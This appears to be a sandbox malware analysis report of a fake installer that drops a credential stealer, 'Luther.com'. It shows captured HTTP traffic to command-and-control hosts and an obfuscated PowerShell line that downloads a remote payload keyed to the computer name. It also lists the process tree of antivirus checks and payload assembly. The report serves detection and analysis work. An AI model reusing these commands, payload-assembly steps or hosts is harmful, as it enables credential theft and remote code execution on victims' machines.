                                                                                                        2025-01-12 14:29:22 UTC5213OUTData Raw: 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: F3Wun 4F([:7s~X`nO`i
                                                                                                        2025-01-12 14:29:23 UTC1139INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:22 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=737ekb1q1hkotvfqlbvi1n268j; expires=Thu, 08 May 2025 08:16:01 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Msk7Kc9khTNwXaKh%2Fsjwdfp8%2FuD2JW5SdZMFmTNNjAbbLomAQ8cYsRFh6YdTpr3ISOqOYVoblO8rGy%2ByEMNUTw3iAJW6Rkady8%2BFmEa2F8di%2B3CnKhej%2B0UbJib5v7MfsSxmOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd69eaea74388-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1568&rtt_var=643&sent=13&recv=26&lost=0&retrans=0&sent_bytes=3053&recv_bytes=21503&delivery_rate=2446927&cwnd=222&unsent_bytes=0&cid=97146bb4fc670f92&ts=718&x=0"
                                                                                                        2025-01-12 14:29:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-12 14:29:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.549761104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:23 UTC274OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SNQRJQPDJY
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1337
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:23 UTC1337OUTData Raw: 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                        Data Ascii: --SNQRJQPDJYContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--SNQRJQPDJYContent-Disposition: form-data; name="pid"1--SNQRJQPDJYContent-Disposition: form-data; name="lid"jMw1IE--psyche--SNQRJQPDJYContent
                                                                                                        2025-01-12 14:29:24 UTC1142INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:24 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=jasg5vt2414n5q8m4a0c3n3u5m; expires=Thu, 08 May 2025 08:16:03 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YWYroIfk6Q%2F%2BcFM3k1C7lkMpEQxx0LCfY9Cx3sYNCke%2FsNTzXg%2BDMrm%2FY4Ns35AmtGFicshkQ9IY3WspznjICI9KMt56ycdd%2BtVLy8RO96%2BuSWOJV9AkGgE1g5rPq%2FS3j%2BR3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd6a86f9b41ba-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1729&rtt_var=673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2247&delivery_rate=2393442&cwnd=193&unsent_bytes=0&cid=2031a05a8f4b01de&ts=484&x=0"
                                                                                                        2025-01-12 14:29:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-12 14:29:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.549772104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:24 UTC276OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=AQP4E5FX5O04
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1081
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:24 UTC1081OUTData Raw: 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d
                                                                                                        Data Ascii: --AQP4E5FX5O04Content-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--AQP4E5FX5O04Content-Disposition: form-data; name="pid"1--AQP4E5FX5O04Content-Disposition: form-data; name="lid"jMw1IE--psyche--AQP4E5FX5O04
                                                                                                        2025-01-12 14:29:25 UTC1136INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:25 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=09tm5baacr1d11tnq7ve852sm3; expires=Thu, 08 May 2025 08:16:04 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HgeZZjVvr2gC2W438j21AsjbQg22%2ByQ2T6UzdJIkSdc9cNTd5XE856Sm%2F0orhRY%2FsIJ%2BS2SrO2pOM700kls00omeh1Aaf0QysaKs17WKCOvSDH4epporF%2BsZufwb87cczc1%2BcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd6aeaf7641ba-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1715&rtt_var=661&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3054&recv_bytes=1993&delivery_rate=2451035&cwnd=193&unsent_bytes=0&cid=1e0f440946f66b06&ts=511&x=0"
                                                                                                        2025-01-12 14:29:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-12 14:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.549777104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:25 UTC266OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 115
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:25 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44
                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=C3834A3F35ECAD72CC299D05D6BFACED
                                                                                                        2025-01-12 14:29:26 UTC1132INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:26 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=0gvn8p7m1dc1109f30570rc51r; expires=Thu, 08 May 2025 08:16:05 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tn6rYXjawXUW8u4VxXuIZ%2F5UxFMVSI7Dhznee8c6c8Wu%2FoPivBVVnnv1aNfPe5xrQMPANRftW5FBLBd5XFwfXJZV5QQsv7vdzYc4sLJA%2BXGVpWsfQP5%2BbhDy6hy3QCNlbBUeZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd6b4f9930fa8-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1442&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3054&recv_bytes=1017&delivery_rate=2818532&cwnd=253&unsent_bytes=0&cid=9c7de9eaca25de9e&ts=494&x=0"
                                                                                                        2025-01-12 14:29:26 UTC218INData Raw: 64 34 0d 0a 32 39 66 59 45 59 46 57 4f 6e 51 69 6b 43 73 53 5a 55 63 46 69 4b 78 6a 4b 62 38 39 37 64 4e 46 30 63 46 4c 68 53 6b 66 72 34 53 41 72 50 70 6b 6f 32 77 59 48 46 62 6b 57 32 46 66 47 79 72 55 67 77 42 4d 32 45 6a 44 6f 43 32 2b 73 52 65 71 45 53 71 59 73 4f 6e 68 36 69 57 31 59 47 5a 62 55 76 67 46 5a 68 30 7a 4a 36 53 4f 42 56 32 64 42 39 2f 2f 5a 37 54 6a 63 62 52 55 4d 39 53 6d 72 76 58 69 4d 2b 6b 69 54 67 52 52 71 6e 63 39 4f 57 68 75 35 4d 55 54 54 74 42 54 6d 4c 74 72 6f 71 6b 6b 39 58 55 77 78 75 71 76 69 4c 74 39 38 51 6c 4a 48 45 4f 2b 58 32 6f 52 5a 53 6d 71 79 68 63 4c 68 51 33 42 38 53 44 7a 2b 33 76 34 64 41 3d 3d 0d 0a
                                                                                                        Data Ascii: d429fYEYFWOnQikCsSZUcFiKxjKb897dNF0cFLhSkfr4SArPpko2wYHFbkW2FfGyrUgwBM2EjDoC2+sReqESqYsOnh6iW1YGZbUvgFZh0zJ6SOBV2dB9//Z7TjcbRUM9SmrvXiM+kiTgRRqnc9OWhu5MUTTtBTmLtroqkk9XUwxuqviLt98QlJHEO+X2oRZSmqyhcLhQ3B8SDz+3v4dA==
                                                                                                        2025-01-12 14:29:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.549782185.161.251.214437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:27 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Host: cegu.shop
                                                                                                        2025-01-12 14:29:27 UTC249INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.26.2
                                                                                                        Date: Sun, 12 Jan 2025 14:29:27 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Content-Length: 329
                                                                                                        Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                        Connection: close
                                                                                                        ETag: "676c9e2a-149"
                                                                                                        Accept-Ranges: bytes
                                                                                                        2025-01-12 14:29:27 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                        Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:09:28:55
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\installer_1.05_37.4.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'120'175 bytes
                                                                                                        MD5 hash:A2E9824E77BE1FBC29913FFD0B324823
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:09:28:56
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd
                                                                                                        Imagebase:0x790000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:09:28:56
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:09:28:58
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0x5a0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:09:28:58
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                        Imagebase:0x830000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:09:28:58
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0x5a0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:09:28:58
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                        Imagebase:0x830000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c md 224553
                                                                                                        Imagebase:0x790000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:extrac32 /Y /E Choosing
                                                                                                        Imagebase:0x320000
                                                                                                        File size:29'184 bytes
                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /V "Readily" Departure
                                                                                                        Imagebase:0x830000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:11
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com
                                                                                                        Imagebase:0x790000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z
                                                                                                        Imagebase:0x790000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:Luther.com z
                                                                                                        Imagebase:0xe30000
                                                                                                        File size:947'288 bytes
                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        Target ID:14
                                                                                                        Start time:09:28:59
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:choice /d y /t 5
                                                                                                        Imagebase:0xad0000
                                                                                                        File size:28'160 bytes
